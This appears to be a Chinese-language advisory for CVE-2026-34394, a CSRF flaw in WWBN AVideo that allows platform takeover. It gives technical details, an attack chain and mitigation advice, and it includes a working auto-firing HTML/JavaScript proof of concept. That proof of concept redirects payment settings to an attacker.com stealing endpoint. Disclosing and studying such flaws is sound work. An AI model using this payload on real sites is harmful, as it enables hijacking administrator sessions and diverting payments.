CVE-2026-34394 CVSS 8.1 高危

CVE-2026-34394: AVideo CSRF漏洞致平台接管

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34394

漏洞类型

CSRF

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WWBN AVideo

漏洞概述

WWBN AVideo 26.0及之前版本存在CSRF漏洞。由于管理员插件配置端点缺乏CSRF令牌验证，且应用使用SameSite=None策略，攻击者可诱骗管理员点击恶意链接，绕过安全检查并覆盖任意插件设置，从而完全接管平台。

技术细节

该漏洞的核心在于WWBN AVideo的`admin/save.json.php`端点在处理管理员插件配置请求时，完全缺失了CSRF令牌验证机制，未调用`isGlobalTokenValid()`或`verifyToken()`函数。由于应用程序配置了`SameSite=None`的Cookie属性，浏览器会允许在跨域请求中携带用户的身份Cookie。此外，源码中的`objects/Object.php`文件通过`ignoreTableSecurityCheck()`函数将`plugins`表列入了安全检查白名单，致使常规的表级访问控制被绕过。攻击者利用此组合缺陷，可以精心构造恶意的HTML页面，诱导已登录的管理员访问。当管理员浏览器加载该页面时，会自动向目标站点发起跨站POST请求，修改支付处理器、认证提供商等敏感插件配置，从而在不获取管理员账号密码的情况下接管整个平台。

攻击链分析

STEP 1

1. 侦察

攻击者确认目标使用的是WWBN AVideo 26.0或更早版本，并识别出管理员用户。

STEP 2

2. 构造攻击载荷

攻击者编写一个HTML页面，包含向`admin/save.json.php`发送恶意POST请求的JavaScript代码，旨在修改关键插件配置。

STEP 3

3. 诱导访问

攻击者将恶意HTML页面托管在第三方服务器，并通过钓鱼邮件或社会工程学手段诱导目标管理员访问该链接。

STEP 4

4. 执行请求

当管理员访问链接时，浏览器由于SameSite=None策略，自动发送包含会话Cookie的跨域POST请求到目标服务器。

STEP 5

5. 完成接管

服务器处理请求，由于缺乏CSRF验证且插件表在白名单中，恶意配置被保存，攻击者获得平台控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Proof of Concept for CVE-2026-34394 -->
<!-- This HTML file should be hosted on an attacker-controlled domain -->
<html>
<body>
<h2>You are being redirected...</h2>
<script>
  function exploit() {
    // The vulnerable endpoint on the target AVideo platform
    var targetUrl = "http://victim-site.com/admin/save.json.php";
    
    // Malicious parameters to overwrite plugin settings (e.g., changing payment gateway)
    // These parameters depend on the specific plugin configuration structure
    var payload = "plugin_name=PaymentGateway&new_payment_url=http://attacker.com/steal.php";
    
    var xhr = new XMLHttpRequest();
    xhr.open("POST", targetUrl, true);
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    
    // withCredentials = true ensures cookies are sent due to SameSite=None
    xhr.withCredentials = true;
    
    xhr.onreadystatechange = function () {
      if (xhr.readyState === 4) {
        console.log("Exploit request sent");
      }
    };
    
    xhr.send(payload);
  }

  // Automatically trigger the exploit when the page loads
  window.onload = exploit;
</script>
</body>
</html>

影响范围

WWBN AVideo <= 26.0

防御指南

临时缓解措施

目前官方尚未发布补丁。建议管理员通过Web应用防火墙（WAF）拦截对`admin/save.json.php`端点的外部POST请求，或者在服务器端配置严格的Referer/Origin头部检查，仅允许同源请求访问管理接口，以降低被攻击的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表